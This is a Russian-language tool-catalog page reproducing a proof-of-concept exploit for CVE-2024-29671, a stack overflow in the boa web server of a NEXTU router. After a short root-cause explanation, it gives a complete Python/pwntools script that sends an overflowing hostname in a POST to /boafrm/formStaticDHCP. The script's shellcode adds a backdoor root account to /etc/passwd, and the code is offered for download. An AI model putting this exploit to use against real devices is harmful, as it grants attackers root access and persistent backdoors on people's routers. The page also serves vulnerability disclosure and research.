Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-29671-POC — Это POC уязвимости CVE-2024-29671 | Kitploit
Инструменты/GitHubGitHub/laskdjlaskdj12/cve-2024-29671-poc
Безопасность встроенных системБезопасность IoTГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного ДоступаЭксплуатация Бинарных Файлов
GitHub
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
laskdjlaskdj12/cve-2024-29671-poc

CVE-2024-29671-POC

Это POC уязвимости CVE-2024-29671

Репозиторий

POC-эксплойт RCE для роутера NEXTU FLETA Wifi6

В этом документе описывается эксплуатация уязвимости CVE-2024-29671 в прошивке роутера NEXTU FLATA AX1500.

Среда выполнения

Этот роутер основан на архитектуре MIPS с чипсетом Realtek и порядком байт Little-Endian.
Версия прошивки целевого роутера — v1.0.2.

Эта прошивка содержит встроенный веб-сервер с названием "boa", последний релиз которого состоялся в 2005 году.
Однако этот роутер использует веб-сервер boa для предоставления административной веб-страницы, управляющей прошивкой роутера.

Причина уязвимости

Статус безопасности бинарного файла "boa" выглядит следующим образом.

fig_1.png Рис. 1. Результат checksec для бинарного файла веб-сервера boa

Причина переполнения стека заключается в том, что проверка длины не выполнялась при копировании содержимого параметра hostname с помощью strcpy() в функции formStaticDHCP по адресу 0x00411c00, когда обработчик запросов обрабатывает form-запросы в веб-сервере boa.

fig_2.png Рис. 2. Место возникновения переполнения стека



fig_3.png Рис. 3. Вид памяти стека до возникновения переполнения стека. (Белая линия — область адреса возврата RET)



fig_4.png

Рис. 4. Вид памяти стека после возникновения переполнения стека.



Как видно, по адресу стека 0x7ffef7dc, где хранится RET-адрес обработчика, данные перезаписаны значением 0x42 ('B').

Описание эксплойта

Если злоумышленник вставит код удалённого выполнения и добавит адрес перезаписи в область RET в значение параметра 'hostname' POST-запроса /boafrm/formStaticDHCP, произвольный код будет выполнен с правами root.

POC уязвимости

root@kitploit:~
from pwn import *  
from hackebds import *  
  
# id: rOOt  
# passwd: pwn3d  
  
def add_user_credential_shell_code():  
    context.update(arch='mips', os='linux', bits=32, endian='little')  
  
    cmd = "/bin/sh"  
    args = ["sh", "-c", "echo \"rOOt:XJ1GV.nyFFMoI:0:0:root:/:/bin/sh\" >> /etc/passwd"]  
  
    asmcode = shellcraft.mips.linux.execve(cmd, args) + shellcraft.mips.linux.exit()  
    shellcode = asm(asmcode)  
    return shellcode  
  
  
  
shellcode = add_user_credential_shell_code()  
  
print(shellcode)  
gap_code = (b'A') * 1282  

# insert RET Address by your own
# In this case, the address value is in the video below that execute RCE.
RET_address = (b'\xe0\x4e\xb9\x7f')  
stack_gap = (b'B') * 0x180  
  
final_code = gap_code + RET_address + stack_gap + shellcode  
  
import socket  
import ssl  
  
# Boa Webserver Connect Address
HOST = '192.168.1.254'  
PORT = 443  
  
context = ssl.create_default_context()  
context.set_ciphers('HIGH:!DH:!aNULL')  
context.check_hostname = False  
context.verify_mode = ssl.CERT_NONE  
  
with socket.create_connection((HOST, PORT)) as sock:  
    with context.wrap_socket(sock, server_hostname=HOST) as ssock:  
  
        # Make Request Body
        send_byte = b"ip_addr=AAA&mac_addr=AAA&static_dhcp=%00%00&addRsvIPFlag=%00%00&addRsvIP=%00%00&deleteSelRsvIP=%00%00&modifyRsvIP=AAA&hostname=" + final_code  
  
        # POST Request Header
        headers = b"POST /boafrm/formStaticDHCP HTTP/1.1\r\n" \  
                  b"Host: " + HOST.encode('utf-8') + b"\r\n" \  
                                                     b"Content-Type: application/octet-stream\r\n" \  
                                                     b"Content-Length: " + str(len(send_byte)).encode(  
            'utf-8') + b"\r\nConnection: close\r\n\r\n"  
  
        ssock.send(headers + send_byte)  
  
        response = b""  
        while True:  
            data = ssock.recv(1024)  
            if not data:  
                break  
            response += data  
  
        print(response.decode('utf-8'))

Видео выполнения эксплойта


https://github.com/user-attachments/assets/41c7cd6f-3e9d-4bb8-ab04-973e8b074bed


Воздействие

Эта уязвимость приводит к проблемам RCE и DOS.

Хронология

2024-03-17: Запрошен номер CVE
2024-03-22: Присвоен номер CVE — CVE-2024-29671
2024-03~ 2024-05: Отчёт передан компании

Исследователь

Ku In Hoe

Помог мне зарегистрировать эту уязвимость Ассистент профессора Seonghoon Jeong (Женский университет Сукмён)

Скачать инструмент